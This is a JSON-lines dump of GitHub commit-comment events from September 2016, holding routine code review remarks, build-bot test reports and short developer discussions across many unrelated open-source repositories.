{"id":"4528998907","type":"CommitCommentEvent","actor":{"login":"PeteJodo"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18931751,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:05:49Z","updated_at":"2016-09-07T17:05:49Z","body":"from lodash's `isFunction` source:\r\n> // The use of `Object#toString` avoids issues with the `typeof` operator\r\n      // in Safari 8-9 which returns 'object' for typed array and other constructors.\r\n\r\nI can use `typeof` but I don't like it too much due to issues caused by browser subtleties "}},"created_at":"2016-09-07T17:05:49Z"}
{"id":"4529000199","type":"CommitCommentEvent","actor":{"login":"DjWarmonger"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18931756,"position":null,"line":null,"path":null,"commit_id":"c6d257f328992e5e1c383d0bdff118f34aa48668","created_at":"2016-09-07T17:06:04Z","updated_at":"2016-09-07T17:06:04Z","body":"Just encountered this, could be related. Certainly it's a new issue.\r\n\r\n![failed to save cquest](https://cloud.githubusercontent.com/assets/2566990/18321387/1050c8fa-752e-11e6-9074-7ba2259b6a51.png)\r\n"}},"created_at":"2016-09-07T17:06:04Z"}
{"id":"4529000930","type":"CommitCommentEvent","actor":{"login":"Saify"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":18931758,"position":null,"line":null,"path":null,"commit_id":"6b36e266c6dc47ccb2746a649f9ac13123673d09","created_at":"2016-09-07T17:06:13Z","updated_at":"2016-09-07T17:06:13Z","body":"Hi,\r\n\r\nI have tried following two installations and installed WebObject543,\r\n\r\nWOInstaller.jar\r\nhttp://wocommunity.org/documents/tools/\r\n\r\nWebObjects543.dmg\r\nsupport.apple.com/downloads/DL688/en_US/WebObjects543.dmg\r\n\r\nAnd recently I have tried latest Wonder frameworks https://github.com/wocommunity/wonder\r\n\r\nbut still facing same error,\r\n\r\nI will appreciate any help,"}},"created_at":"2016-09-07T17:06:13Z"}
{"id":"4529001501","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18931760,"position":null,"line":null,"path":null,"commit_id":"f3d116f100224a6bfcce475c61abe2ffa8e2e497","created_at":"2016-09-07T17:06:19Z","updated_at":"2016-09-07T17:06:19Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1185 of 1185 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.94%25-green.svg)</a>\n"}},"created_at":"2016-09-07T17:06:19Z"}
{"id":"4529005675","type":"CommitCommentEvent","actor":{"login":"PeteJodo"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18931770,"position":63,"line":63,"path":"test/spec.js","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:07:07Z","updated_at":"2016-09-07T17:07:07Z","body":"hmm didn't know assert had that for some reason. Don't even need a spy here then too. I'll fix (but I don't think I'll do another release if it's just this fix)"}},"created_at":"2016-09-07T17:07:07Z"}
{"id":"4529007962","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"dmlc/MXNet.jl"},"payload":{"comment":{"id":18931777,"position":null,"line":null,"path":null,"commit_id":"39bc643ee5c54e243c45a5837b408f8ed4f9aa84","created_at":"2016-09-07T17:07:32Z","updated_at":"2016-09-07T17:07:32Z","body":"this isn't actually necessary, `is_windows` is exported from recent versions of Compat"}},"created_at":"2016-09-07T17:07:32Z"}
{"id":"4529008623","type":"CommitCommentEvent","actor":{"login":"shivangagarwal"},"repo":{"name":"sud80/parse-server"},"payload":{"comment":{"id":18931778,"position":6,"line":16,"path":"src/Adapters/Storage/Mongo/MongoTransform.js","commit_id":"675500687e6657fffb7572425e6b955702372963","created_at":"2016-09-07T17:07:39Z","updated_at":"2016-09-07T17:07:39Z","body":"@sud80 will this also change? Or there was a bug?"}},"created_at":"2016-09-07T17:07:39Z"}
{"id":"4529009417","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18931779,"position":17,"line":67,"path":"backend/globaleaks/models/config_desc.py","commit_id":"5d84dd3798a078edfafe27beb082bce9daf3a82e","created_at":"2016-09-07T17:07:47Z","updated_at":"2016-09-07T17:07:47Z","body":"Glad you got the unused fields. Was waiting for the review\r\n"}},"created_at":"2016-09-07T17:07:47Z"}
{"id":"4529011615","type":"CommitCommentEvent","actor":{"login":"antialias"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18931783,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:08:13Z","updated_at":"2016-09-07T17:08:13Z","body":"I don't think those issues affect functions."}},"created_at":"2016-09-07T17:08:13Z"}
{"id":"4529014668","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18931792,"position":null,"line":null,"path":null,"commit_id":"81e08e7d69519ba410c98cabfb10a85a7e1afdbb","created_at":"2016-09-07T17:08:46Z","updated_at":"2016-09-07T17:08:46Z","body":"> Locally I tend do\r\n\r\nSounds good, but will add the PR idea to laundry list 😆 "}},"created_at":"2016-09-07T17:08:46Z"}
{"id":"4529016658","type":"CommitCommentEvent","actor":{"login":"bhajer3"},"repo":{"name":"medseek-engineering/ccs-model-predictions"},"payload":{"comment":{"id":18931795,"position":5,"line":10,"path":"src/main/python/helper.py","commit_id":"2357947dcbe7b70ecfbb5e7592818a5f8c89fa9b","created_at":"2016-09-07T17:09:09Z","updated_at":"2016-09-07T17:09:09Z","body":"Ok this should be fine for now, just be sure not to include any \"|\" in any file names, which we are not. Thanks Abdullah"}},"created_at":"2016-09-07T17:09:09Z"}
{"id":"4529020019","type":"CommitCommentEvent","actor":{"login":"pluskid"},"repo":{"name":"dmlc/MXNet.jl"},"payload":{"comment":{"id":18931804,"position":null,"line":null,"path":null,"commit_id":"39bc643ee5c54e243c45a5837b408f8ed4f9aa84","created_at":"2016-09-07T17:09:45Z","updated_at":"2016-09-07T17:09:45Z","body":"@tkelman Thanks! Now I realized the error I got during my test was due to an out-dated version of `Compat`."}},"created_at":"2016-09-07T17:09:45Z"}
{"id":"4529022614","type":"CommitCommentEvent","actor":{"login":"KristopherWagner"},"repo":{"name":"alberto-acevedo/cesium-navigation"},"payload":{"comment":{"id":18931809,"position":null,"line":null,"path":null,"commit_id":"e87c66ceafb4971b4f491d803bd84ce3a026ae95","created_at":"2016-09-07T17:10:15Z","updated_at":"2016-09-07T17:10:15Z","body":"Thank you! I'll take a look at that and put in a PR later."}},"created_at":"2016-09-07T17:10:15Z"}
{"id":"4529023382","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18931810,"position":62,"line":62,"path":"debug.cc","commit_id":"ef1241fa9e4da18682fa18d537b5e5aef1cd19f5","created_at":"2016-09-07T17:10:23Z","updated_at":"2016-09-07T17:10:23Z","body":"Do we really want to print all messages to stderr? Shouldn't the default handler already take care of writing the output to the command line?"}},"created_at":"2016-09-07T17:10:23Z"}
{"id":"4529025662","type":"CommitCommentEvent","actor":{"login":"5pid"},"repo":{"name":"busk0821/Vocabulary"},"payload":{"comment":{"id":18931820,"position":5,"line":18,"path":"src/main.java","commit_id":"65d3eaead5ba49f399d309f04fe746721cc7d2c6","created_at":"2016-09-07T17:10:48Z","updated_at":"2016-09-07T17:10:48Z","body":"주석은 필요없음"}},"created_at":"2016-09-07T17:10:48Z"}
{"id":"4529027307","type":"CommitCommentEvent","actor":{"login":"yajunliu"},"repo":{"name":"deadlyvipers/dojo_rules"},"payload":{"comment":{"id":18931824,"position":null,"line":null,"path":null,"commit_id":"800b016ae0921db4a4743961d24e104337b2e3b2","created_at":"2016-09-07T17:11:06Z","updated_at":"2016-09-07T17:11:06Z","body":"my favorite is CSS"}},"created_at":"2016-09-07T17:11:06Z"}
{"id":"4529034614","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18931837,"position":86,"line":86,"path":"debug.cc","commit_id":"ef1241fa9e4da18682fa18d537b5e5aef1cd19f5","created_at":"2016-09-07T17:12:29Z","updated_at":"2016-09-07T17:12:29Z","body":"You could use a QScopedPointer instead of deleting the raw pointer..."}},"created_at":"2016-09-07T17:12:29Z"}
{"id":"4529036278","type":"CommitCommentEvent","actor":{"login":"lc-soft"},"repo":{"name":"lc-soft/LC-Finder"},"payload":{"comment":{"id":18931843,"position":26,"line":274,"path":"src/lib/file_cache.c","commit_id":"e6c42e322e6e4d995478596b75c32572fedca969","created_at":"2016-09-07T17:12:47Z","updated_at":"2016-09-07T17:12:47Z","body":"unqlite_kv_cursor_key() 的第三个参数既是输入参数也是输出参数，作为输入参数时是指定 buf的 最大字节数，读取完 key 的内容后，输出的值是实际读取的字节数，之前一直以为第三个参数仅仅是输出参数，由于传递了未初始化的 size 进去，导致 key 的内容未被读取出来。"}},"created_at":"2016-09-07T17:12:47Z"}
{"id":"4529037053","type":"CommitCommentEvent","actor":{"login":"patriciammencia"},"repo":{"name":"patriciammencia/RAIDER"},"payload":{"comment":{"id":18931844,"position":null,"line":null,"path":null,"commit_id":"fd896093db7dcfe2ff1411038e080bb4417c928d","created_at":"2016-09-07T17:12:57Z","updated_at":"2016-09-07T17:12:57Z","body":"The first upload of mi Master Final Thesis."}},"created_at":"2016-09-07T17:12:57Z"}
{"id":"4529040005","type":"CommitCommentEvent","actor":{"login":"piotrkodilla"},"repo":{"name":"olkola/kodilla"},"payload":{"comment":{"id":18931849,"position":2,"line":1,"path":"style.css","commit_id":"a69b0235ee87d23d2b10d5eec8f0ab33e6afdc8f","created_at":"2016-09-07T17:13:31Z","updated_at":"2016-09-07T17:13:31Z","body":"usunięcie spacji"}},"created_at":"2016-09-07T17:13:31Z"}
{"id":"4529042102","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"dmlc/MXNet.jl"},"payload":{"comment":{"id":18931858,"position":null,"line":null,"path":null,"commit_id":"39bc643ee5c54e243c45a5837b408f8ed4f9aa84","created_at":"2016-09-07T17:13:55Z","updated_at":"2016-09-07T17:13:55Z","body":"ah. lower bounds in REQUIRE file are important for that very reason!"}},"created_at":"2016-09-07T17:13:55Z"}
{"id":"4529046076","type":"CommitCommentEvent","actor":{"login":"cnanders"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18931868,"position":null,"line":null,"path":null,"commit_id":"cabeeb8dabfdd0a545734d293a840f4cd05e7f46","created_at":"2016-09-07T17:14:42Z","updated_at":"2016-09-07T17:14:42Z","body":"I think scalingMode should be an `int`, not a string.  See https://developer.android.com/reference/android/media/MediaPlayer.html#setVideoScalingMode(int)"}},"created_at":"2016-09-07T17:14:42Z"}
{"id":"4529046642","type":"CommitCommentEvent","actor":{"login":"dbadesha"},"repo":{"name":"dbadesha/ReactWeatherApp"},"payload":{"comment":{"id":18931871,"position":14,"line":13,"path":"webpack.config.js","commit_id":"d8de5216632bfba9627fd9a304e3d2eb2236ae3a","created_at":"2016-09-07T17:14:47Z","updated_at":"2016-09-07T17:14:47Z","body":"Add foundation min and jQuery"}},"created_at":"2016-09-07T17:14:47Z"}
{"id":"4529047133","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18931872,"position":null,"line":null,"path":null,"commit_id":"f9cc6c2d4f11f41f760aee241862982b231a7aec","created_at":"2016-09-07T17:14:53Z","updated_at":"2016-09-07T17:14:53Z","body":"```javascript\r\nvar result = 0;\r\n\r\nfunction performAddition() {\r\n  Ops.add(result, Calc.readDisplay())\r\n}\r\n```\r\n```html\r\n<div id=\"add\" onclick=\"performAddition()\">+</div>\r\n```\r\nIt's not the best solution but it's _simle_. Try implementing rest of the functions ;)  "}},"created_at":"2016-09-07T17:14:53Z"}
{"id":"4529047813","type":"CommitCommentEvent","actor":{"login":"dbadesha"},"repo":{"name":"dbadesha/ReactWeatherApp"},"payload":{"comment":{"id":18931873,"position":8,"line":29,"path":"package.json","commit_id":"d8de5216632bfba9627fd9a304e3d2eb2236ae3a","created_at":"2016-09-07T17:15:02Z","updated_at":"2016-09-07T17:15:02Z","body":"updates in package json\r\n"}},"created_at":"2016-09-07T17:15:02Z"}
{"id":"4529049833","type":"CommitCommentEvent","actor":{"login":"dbadesha"},"repo":{"name":"dbadesha/ReactWeatherApp"},"payload":{"comment":{"id":18931881,"position":6,"line":18,"path":"app/components/WeatherInputForm.jsx","commit_id":"d8de5216632bfba9627fd9a304e3d2eb2236ae3a","created_at":"2016-09-07T17:15:24Z","updated_at":"2016-09-07T17:15:24Z","body":"actually searching city"}},"created_at":"2016-09-07T17:15:24Z"}
{"id":"4529052411","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18931885,"position":null,"line":null,"path":null,"commit_id":"ef1241fa9e4da18682fa18d537b5e5aef1cd19f5","created_at":"2016-09-07T17:15:53Z","updated_at":"2016-09-07T17:15:53Z","body":"I have to admit that this looks uglier than I imagined when I proposed this. It would have been nice if `qInstallMessageHandler` accepted a function object (like what is returned from std::bind)...\r\n\r\nAnyway, +1"}},"created_at":"2016-09-07T17:15:53Z"}
{"id":"4529056361","type":"CommitCommentEvent","actor":{"login":"Spliffjiffer"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18931891,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T17:16:39Z","updated_at":"2016-09-07T17:16:39Z","body":"... after only 2300 games played it looks like a WOW-patch indeed....impressive"}},"created_at":"2016-09-07T17:16:39Z"}
{"id":"4529060278","type":"CommitCommentEvent","actor":{"login":"Marco01809"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18931898,"position":null,"line":null,"path":null,"commit_id":"e4887362ec33d6ee191a0df27303ea74de05d54e","created_at":"2016-09-07T17:17:23Z","updated_at":"2016-09-07T17:17:23Z","body":"Other than the bug I inline-commented on, this seems to work well. Thanks!"}},"created_at":"2016-09-07T17:17:23Z"}
{"id":"4529063559","type":"CommitCommentEvent","actor":{"login":"burak13"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18931909,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T17:17:59Z","updated_at":"2016-09-07T17:17:59Z","body":"Wow! LTC test is going unbelievably strong! We might be witnessing the best non-SMP patch ever! Hope it's not just a luck."}},"created_at":"2016-09-07T17:17:59Z"}
{"id":"4529066175","type":"CommitCommentEvent","actor":{"login":"EmmanuelP"},"repo":{"name":"AravisProject/aravis"},"payload":{"comment":{"id":18931911,"position":14,"line":1124,"path":"viewer/arvviewer.c","commit_id":"5b10fc12d741cf44f267216fae1d1ac4fc9c3aeb","created_at":"2016-09-07T17:18:26Z","updated_at":"2016-09-07T17:18:26Z","body":"It is an error to call g_error_free if error == NULL. You should include this call in the if statement."}},"created_at":"2016-09-07T17:18:26Z"}
{"id":"4529069266","type":"CommitCommentEvent","actor":{"login":"martinallison"},"repo":{"name":"potatolondon/search"},"payload":{"comment":{"id":18931917,"position":null,"line":null,"path":null,"commit_id":"551c31868ee9e6d56117aa99609c62c2eb8e9761","created_at":"2016-09-07T17:19:02Z","updated_at":"2016-09-07T17:19:02Z","body":"Weird! Having to do this smells like something being wrong.\r\n\r\nWhat was the specific case?"}},"created_at":"2016-09-07T17:19:02Z"}
{"id":"4529072687","type":"CommitCommentEvent","actor":{"login":"vchuravy"},"repo":{"name":"dmlc/mxnet"},"payload":{"comment":{"id":18931927,"position":4,"line":111,"path":"tests/travis/run_test.sh","commit_id":"3e15f6288609419e7bf5aa3119b1212eaeeec8be","created_at":"2016-09-07T17:19:38Z","updated_at":"2016-09-07T17:19:38Z","body":"Was there any particular reason why the Julia tests were removed?"}},"created_at":"2016-09-07T17:19:38Z"}
{"id":"4529074878","type":"CommitCommentEvent","actor":{"login":"emmacunningham"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18931935,"position":29,"line":29,"path":"ui/movie_display.jsx","commit_id":"fc637d6d382edaae48e19b6e4f44a76724ac7bb8","created_at":"2016-09-07T17:20:03Z","updated_at":"2016-09-07T17:20:03Z","body":"See [this comment](https://github.com/trevorcai/react-starter/commit/58a24f394b9468add37759fad182b12a3318a804#commitcomment-18931696) - you can apply the same concept here."}},"created_at":"2016-09-07T17:20:03Z"}
{"id":"4529081847","type":"CommitCommentEvent","actor":{"login":"Anumittal"},"repo":{"name":"saketagarwal/placements"},"payload":{"comment":{"id":18931952,"position":17,"line":17,"path":"Array/src/BubbleSort.java","commit_id":"80e0910e84b238aa45c011ec7a4f73d308748af5","created_at":"2016-09-07T17:21:20Z","updated_at":"2016-09-07T17:21:20Z","body":"take care of indentation."}},"created_at":"2016-09-07T17:21:20Z"}
{"id":"4529084745","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18931959,"position":null,"line":null,"path":null,"commit_id":"b28f6c841313253b7444e79afa4a0e5d540a0c2a","created_at":"2016-09-07T17:21:52Z","updated_at":"2016-09-07T17:21:52Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35036/testReport/) for this commit**"}},"created_at":"2016-09-07T17:21:52Z"}
{"id":"4529085295","type":"CommitCommentEvent","actor":{"login":"ehcloninger"},"repo":{"name":"saimn/sigal"},"payload":{"comment":{"id":18931963,"position":null,"line":null,"path":null,"commit_id":"2eafd03091682fa6b2e00cbfd1e60522847b6282","created_at":"2016-09-07T17:22:00Z","updated_at":"2016-09-07T17:22:00Z","body":"Add the text description of an image from the EXIF to list of tags returned to theme. In my custom theme, I add the following line to index.html, after date/time\r\n\r\n{% if media.exif.ImageDescription %}<br/><br/>{{ media.exif.ImageDescription }}{% endif %}\r\n"}},"created_at":"2016-09-07T17:22:00Z"}
{"id":"4529086072","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18931964,"position":null,"line":null,"path":null,"commit_id":"714e7e1170a3aa127c1d11fb21d1fc418aa97cbb","created_at":"2016-09-07T17:22:10Z","updated_at":"2016-09-07T17:22:10Z","body":"FixCentroidForNonconvex (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2330 of 2332 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T17:22:10Z"}
{"id":"4529089207","type":"CommitCommentEvent","actor":{"login":"speigg"},"repo":{"name":"argonjs/argon"},"payload":{"comment":{"id":18931972,"position":20,"line":4555,"path":"dist/argon.js","commit_id":"a8764f7728ae6a83d74090568378c3328bba3904","created_at":"2016-09-07T17:22:44Z","updated_at":"2016-09-07T17:22:44Z","body":"We don't need an iframe element for this, just the video element"}},"created_at":"2016-09-07T17:22:44Z"}
{"id":"4529090749","type":"CommitCommentEvent","actor":{"login":"mauricetmeyer"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18931978,"position":null,"line":null,"path":null,"commit_id":"1691f3fd8db312cb450ad33968a2a0b061280023","created_at":"2016-09-07T17:23:01Z","updated_at":"2016-09-07T17:23:01Z","body":"@mpiecora just realised that i broke it when i cleaned up the script... So this commit should fix it"}},"created_at":"2016-09-07T17:23:01Z"}
{"id":"4529091358","type":"CommitCommentEvent","actor":{"login":"jwhuisman"},"repo":{"name":"davinci-ao/de-vloot"},"payload":{"comment":{"id":18931980,"position":null,"line":null,"path":null,"commit_id":"27355a33275f47c3ca43e2b0739a20192114c537","created_at":"2016-09-07T17:23:09Z","updated_at":"2016-09-07T17:23:09Z","body":"Hoi Tim,\n\nDe opdracht schrijft voor dat je met de overgebleven afbeeldingen een\nnieuwe pagina moet maken. Het klopt dat hier geen ontwerp van is.\n\nHier mag je je eigen inspiratie voor gebruiken. Gebruik wel alle technieken\ndie je hebt geleerd.\n\nSucces!\n\nGroetjes,\nJan-Willem Huisman\n\nOp 7 september 2016 15:30 schreef Tim <notifications@github.com>:\n\n> ik mis het voorbeeld voor de pagina onderzeeërs... tot die tijd kan ik\n> eigenlijk niet verder maar ik maak er zelf wel een leuke van\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/davinci-ao/de-vloot/commit/27355a33275f47c3ca43e2b0739a20192114c537#commitcomment-18928243>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADRx31QTAxF2kGUee0SNnW7RDiUsKdkTks5qnrxagaJpZM4J260Y>\n> .\n>\n"}},"created_at":"2016-09-07T17:23:09Z"}
{"id":"4529097428","type":"CommitCommentEvent","actor":{"login":"mauricetmeyer"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18932015,"position":null,"line":null,"path":null,"commit_id":"1691f3fd8db312cb450ad33968a2a0b061280023","created_at":"2016-09-07T17:24:22Z","updated_at":"2016-09-07T17:24:22Z","body":"- It now shows that special track display. But it's not working yet. I should figure that out some time soon."}},"created_at":"2016-09-07T17:24:22Z"}
{"id":"4529100610","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnEcrins/GeoNature-atlas"},"payload":{"comment":{"id":18932035,"position":10,"line":0,"path":"main/modeles/repositories/vmObservationsMaillesRepository.py","commit_id":"e56649843c31442fa4e3c3b55f7d66b75e791df0","created_at":"2016-09-07T17:25:00Z","updated_at":"2016-09-07T17:25:00Z","body":"Pourquoi ne pas mettre le paramètre ici plutôt que l'ID en dur ? "}},"created_at":"2016-09-07T17:25:00Z"}
{"id":"4529101417","type":"CommitCommentEvent","actor":{"login":"PeteJodo"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18932036,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:25:12Z","updated_at":"2016-09-07T17:25:12Z","body":"from what I understand using `typeof` on a `new Function()` would return `'object'` but I guess nobody defines functions that way anyway so I guess I'll fix it"}},"created_at":"2016-09-07T17:25:12Z"}
{"id":"4529106542","type":"CommitCommentEvent","actor":{"login":"emmacunningham"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18932046,"position":13,"line":16,"path":"ui/reducer.js","commit_id":"fc637d6d382edaae48e19b6e4f44a76724ac7bb8","created_at":"2016-09-07T17:26:13Z","updated_at":"2016-09-07T17:26:13Z","body":"If you add `SEARCH_COMPLETE` and `FETCH_SINGLE_COMPLETE` to your action types, you can just refer to the constants (similar to how you handle `types.UPDATE_TEXT`)."}},"created_at":"2016-09-07T17:26:13Z"}
{"id":"4529106651","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18932048,"position":87,"line":91,"path":"styles/album.css","commit_id":"31efff16ac1d1a01518d356d2e662023cea4c281","created_at":"2016-09-07T17:26:14Z","updated_at":"2016-09-07T17:26:14Z","body":"why is this tabbed so far over? keep it one tab under the class name"}},"created_at":"2016-09-07T17:26:14Z"}
{"id":"4529112404","type":"CommitCommentEvent","actor":{"login":"FranciniSilva"},"repo":{"name":"FranciniSilva/xti"},"payload":{"comment":{"id":18932063,"position":null,"line":null,"path":null,"commit_id":"1511727901e35cc90c1ca00fab1adc99f0072218","created_at":"2016-09-07T17:27:20Z","updated_at":"2016-09-07T17:27:20Z","body":"\t\t//Operador         FINALIDADE\r\n +\t\t//+,-,*,?,%        Soma, subtrai, multiplica, divide, módulo - resto da divisão\r\n +\t\t//+                Concatena string\r\n +\t\t//+,-              Operador unário mais e menos\r\n +\t\t//<,>,<=,>=        Comparar, menor que, maior que,menor igual que, maior igual que\r\n +\t\t//++,--            Pré ou pós incremento, pré ou pós decremento\r\n +\t\t//==,!=            Comparar se é igual ou diferente\r\n +\t\t//&&,||            Concatenção lógica e, concatenação lógica ou\r\n +\t\t//.                Acessar propriedades de um objeto\r\n +\t\t//[]               Indexar Arrays\r\n +\t\t//()               Chamar método\r\n +\t\t//?:               Ternário, retorna booleano\r\n +\t\t//<<,>>,>>>        Operar bit numérico\r\n +\t\t//~                Complemento unário sobre bits\r\n +\t\t//!                Complemento lógico negação\r\n +\t\t//&,|,^            OPerador bit AND, OR XOR\r\n +\t\t//,                Separar valores\r\n +\t\t//+=,-=,*=,/=      Atribuir valores somando, atribuir valores subtraindo, atribuir valores multiplicando, atribuir valores dividindo\r\n +\t\t//<<=,>>=,>>>=     Operador de bytes (unário)\r\n +\t\t//&=,|=,^=         Operador de bytes AND, OR XOR, (unário)\r\n +\t\t//instanceof       Verificar o tipo do objeto\r\n +\t\t//new              Criar objeto\r\n +\t\t//(tipo)           Coerção unária\r\n +\r\n +\t}"}},"created_at":"2016-09-07T17:27:20Z"}
{"id":"4529112549","type":"CommitCommentEvent","actor":{"login":"Super-Baleine"},"repo":{"name":"muonium/core"},"payload":{"comment":{"id":18932064,"position":92,"line":193,"path":"application/controllers/User.php","commit_id":"1908a71c4a610b345f3a457f4e0bfcdea490d0c8","created_at":"2016-09-07T17:27:22Z","updated_at":"2016-09-07T17:27:22Z","body":"I think **rmRdir**, with \"R\" for \"recursive\" is a better function name... "}},"created_at":"2016-09-07T17:27:22Z"}
{"id":"4529115238","type":"CommitCommentEvent","actor":{"login":"emmacunningham"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18932076,"position":26,"line":27,"path":"ui/sagas.jsx","commit_id":"fc637d6d382edaae48e19b6e4f44a76724ac7bb8","created_at":"2016-09-07T17:27:52Z","updated_at":"2016-09-07T17:27:52Z","body":"per the suggestion above to add these types to your actions, once you have them as constants, you can reference them here instead of using the raw strings (for example, `types.FETCH_SINGLE_COMPLETE`).  You can see that one of the benefits of creating constants for your types is that you can share them across your saga and reducer."}},"created_at":"2016-09-07T17:27:52Z"}
{"id":"4529119625","type":"CommitCommentEvent","actor":{"login":"Ingwie"},"repo":{"name":"Ingwie/NextStepRc-2.18"},"payload":{"comment":{"id":18932083,"position":null,"line":null,"path":null,"commit_id":"11e9a50941cc6ac78dbc90fdeeb4ed0095e368b4","created_at":"2016-09-07T17:28:42Z","updated_at":"2016-09-07T17:28:42Z","body":"Thanks, now all the configurations have time to do .. Hum .. A lot of future add-ons ;-)"}},"created_at":"2016-09-07T17:28:42Z"}
{"id":"4529119946","type":"CommitCommentEvent","actor":{"login":"nealedj"},"repo":{"name":"potatolondon/search"},"payload":{"comment":{"id":18932086,"position":null,"line":null,"path":null,"commit_id":"551c31868ee9e6d56117aa99609c62c2eb8e9761","created_at":"2016-09-07T17:28:45Z","updated_at":"2016-09-07T17:28:45Z","body":"This was where the parent model was being saved inside a non_atomic\ndecorator as well - which I guess is a reasonably common case?\n\nOn Wed, 7 Sep 2016 18:19 Martin Allison, <notifications@github.com> wrote:\n\n> Weird! Having to do this smells like something being wrong.\n>\n> What was the specific case?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/potatolondon/search/commit/551c31868ee9e6d56117aa99609c62c2eb8e9761#commitcomment-18931917>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAVu6833G5zGuk6y06eJA5bfpOuY9xooks5qnvIGgaJpZM4J3KG2>\n> .\n>\n"}},"created_at":"2016-09-07T17:28:45Z"}
